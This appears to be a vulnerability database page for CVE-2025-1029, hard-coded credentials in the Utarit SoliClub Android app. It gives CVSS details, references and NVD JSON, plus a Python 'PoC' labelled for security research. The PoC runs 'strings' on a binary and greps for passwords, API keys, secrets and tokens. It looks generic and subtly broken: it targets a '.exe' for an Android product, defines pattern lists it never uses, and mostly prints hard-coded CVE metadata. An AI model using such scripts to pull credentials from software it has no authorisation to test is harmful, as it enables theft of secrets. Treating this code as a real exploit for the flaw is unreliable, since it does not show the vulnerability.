CVE-2025-1029

Description

Use of Hard-coded Credentials vulnerability in Utarit Information Services Inc. SoliClub allows Read Sensitive Constants Within an Executable.This issue affects SoliClub: from 5.2.4 before 5.3.7.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:utarit:soliclub:*:*:*:*:*:android:*:* - VULNERABLE

SoliClub >= 5.2.4

SoliClub < 5.3.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-1029 PoC - Hard-coded Credentials Extraction
# This PoC demonstrates the vulnerability in SoliClub
# Note: This is for educational and authorized testing purposes only

import os
import re
import subprocess
from pathlib import Path

def extract_strings_from_binary(binary_path):
    """Extract potential hardcoded credentials from binary file"""
    print(f"[*] Extracting strings from: {binary_path}")
    
    # Use strings command to extract readable strings
    try:
        result = subprocess.run(['strings', binary_path], 
                              capture_output=True, 
                              text=True, 
                              timeout=30)
        strings_output = result.stdout
    except FileNotFoundError:
        print("[-] 'strings' command not found. Install binutils.")
        return []
    
    # Patterns commonly found in hardcoded credentials
    patterns = [
        r'[A-Za-z0-9]{20,}',  # Long alphanumeric strings (potential keys)
        r'password[=:\s]+[\S]+',  # Password patterns
        r'api[_-]?key[=:\s]+[\S]+',  # API key patterns
        r'secret[=:\s]+[\S]+',  # Secret patterns
        r'token[=:\s]+[\S]+',  # Token patterns
    ]
    
    credentials = []
    for line in strings_output.split('\n'):
        for pattern in patterns:
            if re.search(pattern, line, re.IGNORECASE):
                credentials.append(line.strip())
    
    return credentials

def analyze_soliclub_binary(binary_path):
    """Analyze SoliClub binary for CVE-2025-1029"""
    print(f"[+] Analyzing SoliClub binary for hardcoded credentials...")
    print(f"[+] Target: {binary_path}")
    print("-" * 60)
    
    # Step 1: Extract strings
    creds = extract_strings_from_binary(binary_path)
    
    # Step 2: Search for known credential patterns
    suspicious_patterns = [
        'soli',
        'soliclub',
        'utarit',
        'admin',
        'root',
        'connectionstring',
        'encryptionkey',
    ]
    
    print(f"\n[+] Found {len(creds)} potential credentials:")
    for i, cred in enumerate(creds[:20], 1):
        print(f"  {i}. {cred}")
    
    # Step 3: Check for hardcoded constants
    print("\n[+] Searching for hardcoded constants...")
    constant_patterns = [
        r'[0-9a-f]{32}',  # MD5 hashes
        r'[0-9a-f]{40}',  # SHA1 hashes
        r'[0-9a-f]{64}',  # SHA256 hashes
    ]
    
    # Step 4: Generate report
    print("\n" + "=" * 60)
    print("VULNERABILITY ASSESSMENT")
    print("=" * 60)
    print(f"CVE: CVE-2025-1029")
    print(f"Product: Utarit SoliClub")
    print(f"Vulnerability: Hard-coded Credentials")
    print(f"CVSS Score: 7.5 (High)")
    print(f"CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N")
    print(f"\n[+] Affected Versions: 5.2.4 <= SoliClub < 5.3.7")
    print(f"[+] Remediation: Upgrade to version 5.3.7 or later")

if __name__ == "__main__":
    import sys
    
    if len(sys.argv) > 1:
        binary_path = sys.argv[1]
    else:
        binary_path = "./SoliClub.exe"
    
    if not os.path.exists(binary_path):
        print(f"[-] File not found: {binary_path}")
        print("[-] Please provide path to SoliClub binary")
        sys.exit(1)
    
    analyze_soliclub_binary(binary_path)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-1029
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-1029
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-1029/
[4] VulDB https://vuldb.com/cve/CVE-2025-1029
[5] https://www.usom.gov.tr/bildirim/tr-25-0466

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-1029", "sourceIdentifier": "[email protected]", "published": "2025-12-18T15:15:53.373", "lastModified": "2026-01-16T14:50:49.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of Hard-coded Credentials vulnerability in Utarit Information Services Inc. SoliClub allows Read Sensitive Constants Within an Executable.This issue affects SoliClub: from 5.2.4 before 5.3.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:utarit:soliclub:*:*:*:*:*:android:*:*", "versionStartIncluding": "5.2.4", "versionEndExcluding": "5.3.7", "matchCriteriaId": "6BFA30F5-78F8-44B1-81DD-FB9264F9A1C6"}]}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0466", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}